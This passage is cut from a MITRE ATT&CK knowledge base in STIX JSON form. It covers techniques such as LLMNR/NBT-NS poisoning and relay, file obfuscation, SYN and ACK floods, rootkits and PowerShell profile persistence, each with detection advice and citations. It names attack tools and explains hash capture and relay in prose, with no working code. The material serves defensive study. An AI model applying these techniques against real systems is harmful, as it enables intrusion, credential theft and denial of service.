"Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.", "url": "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules"}, {"source_name": "Microsoft Inbox Rules", "description": "Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.", "url": "https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59"}, {"source_name": "Microsoft New-InboxRule", "description": "Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.", "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps"}, {"source_name": "Microsoft Set-InboxRule", "description": "Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.", "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps"}, {"source_name": "Microsoft Cloud App Security", "description": "Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.", "url": "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "External Defacement", "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system\u2019s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Integrity"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "created": "2020-02-20T14:34:08.496Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1491/002", "external_id": "T1491.002"}, {"source_name": "FireEye Cyber Threats to Media Industries", "description": "FireEye. (n.d.). Retrieved April 19, 2019.", "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf"}, {"source_name": "Kevin Mandia Statement to US Senate Committee on Intelligence", "description": "Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019.", "url": "https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf"}, {"source_name": "Anonymous Hackers Deface Russian Govt Site", "description": "Andy. (2018, May 12). \u2018Anonymous\u2019 Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019.", "url": "https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/"}, {"source_name": "Trend Micro Deep Dive Into Defacement", "description": "Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.", "url": "https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-19T04:03:07.164Z", "name": "Encrypted/Encoded File", "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["David Galazin @themalwareman1", "Andrew Northern, @ex_raritas", "Jai Minton, @Cyberraiju"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "created": "2024-03-29T12:38:17.135Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/013", "external_id": "T1027.013"}, {"source_name": "File obfuscation", "description": "Aspen Lindblom, Joseph Goodwin, and Chris Sheldon. (2021, July 19). Shlayer Malvertising Campaigns Still Using Flash Update Disguise. Retrieved March 29, 2024.", "url": "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/"}, {"source_name": "SFX - Encrypted/Encoded File", "description": "Jai Minton. (2023, March 31). How Falcon OverWatch Investigates Malicious Self-Extracting Archives, Decoy Files and Their Hidden Payloads. Retrieved March 29, 2024.", "url": "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "LLMNR/NBT-NS Poisoning and Relay", "description": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Eric Kuehn, Secure Ideas", "Matthew Demaske, Adaptforward"], "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \u201c0\u201d indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1171", "external_id": "T1171"}, {"source_name": "Wikipedia LLMNR", "description": "Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.", "url": "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution"}, {"source_name": "TechNet NetBIOS", "description": "Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.", "url": "https://technet.microsoft.com/library/cc958811.aspx"}, {"source_name": "byt3bl33d3r NTLM Relaying", "description": "Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.", "url": "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html"}, {"source_name": "Secure Ideas SMB Relay", "description": "Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.", "url": "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html"}, {"source_name": "GitHub NBNSpoof", "description": "Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.", "url": "https://github.com/nomex/nbnspoof"}, {"source_name": "Rapid7 LLMNR Spoofer", "description": "Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.", "url": "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response"}, {"source_name": "GitHub Responder", "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.", "url": "https://github.com/SpiderLabs/Responder"}, {"source_name": "Sternsecurity LLMNR-NBTNS", "description": "Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.", "url": "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning"}, {"source_name": "GitHub Conveigh", "description": "Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.", "url": "https://github.com/Kevin-Robertson/Conveigh"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "IP Addresses", "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", "created": "2020-10-02T15:59:11.695Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1590/005", "external_id": "T1590.005"}, {"source_name": "WHOIS", "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", "url": "https://www.whois.net/"}, {"source_name": "DNS Dumpster", "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", "url": "https://dnsdumpster.com/"}, {"source_name": "Circl Passive DNS", "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", "url": "https://www.circl.lu/services/passive-dns/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "OS Exhaustion Flood", "description": "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "created": "2020-02-20T15:27:18.581Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1499/001", "external_id": "T1499.001"}, {"source_name": "Cisco DoSdetectNetflow", "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf"}, {"source_name": "Cloudflare SynFlood", "description": "Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.", "url": "https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/"}, {"source_name": "Corero SYN-ACKflood", "description": "Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.", "url": "https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html"}, {"source_name": "Arbor AnnualDoSreport Jan 2018", "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Rootkit", "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "File Monitoring", "Host Intrusion Prevention Systems", "Application Control", "Signature-based Detection", "System Access Controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "created": "2017-05-31T21:30:26.496Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1014", "external_id": "T1014"}, {"source_name": "CrowdStrike Linux Rootkit", "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.", "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/"}, {"source_name": "BlackHat Mac OSX Rootkit", "description": "Pan, M., Tsai, S. (2014). You can\u2019t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.", "url": "http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf"}, {"source_name": "Symantec Windows Rootkits", "description": "Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.", "url": "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf"}, {"source_name": "Wikipedia Rootkit", "description": "Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.", "url": "https://en.wikipedia.org/wiki/Rootkit"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-20T17:04:13.976Z", "name": "PowerShell Profile", "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Allen DeRyke, ICE", "Matt Green, @mgreen27"], "x_mitre_deprecated": false, "x_mitre_detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet)(Citation: Microsoft Profiles) Example profile locations (user defaults as well as program-specific) include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\\\\\[My ]Documents\\PowerShell\\Profile.ps1\n* $Home\\\\\\[My ]Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "created": "2020-01-24T15:11:02.758Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/013", "external_id": "T1546.013"}, {"source_name": "Wits End and Shady PowerShell Profiles", "description": "DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege Elevation using the Powershell Profile. Retrieved July 8, 2019.", "url": "https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html"}, {"source_name": "ESET Turla PowerShell May 2019", "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.", "url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/"}, {"source_name": "Malware Archaeology PowerShell Cheat Sheet", "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.", "url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf"}, {"source_name": "Microsoft About Profiles", "description": "Microsoft. (2017, November 29). About Profiles. Retrieved June 14, 2019.", "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6"}, {"source_name": "Microsoft Profiles", "description": "Microsoft. (2021, September 27). about_Profiles. Retrieved February 4, 2022.", "url": "https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "JavaScript", "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple\u2019s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple\u2019s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple\u2019s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Cody Thomas, SpecterOps"], "x_mitre_detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "created": "2020-06-23T19:12:24.924Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/007", "external_id": "T1059.007"}, {"source_name": "NodeJS", "description": "OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.", "url": "https://nodejs.org/"}, {"source_name": "JScrip May 2018", "description": "Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020.", "url": "https://docs.microsoft.com/windows/win32/com/translating-to-jscript"}, {"source_name": "Microsoft JScript 2007", "description": "Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript \u2026. 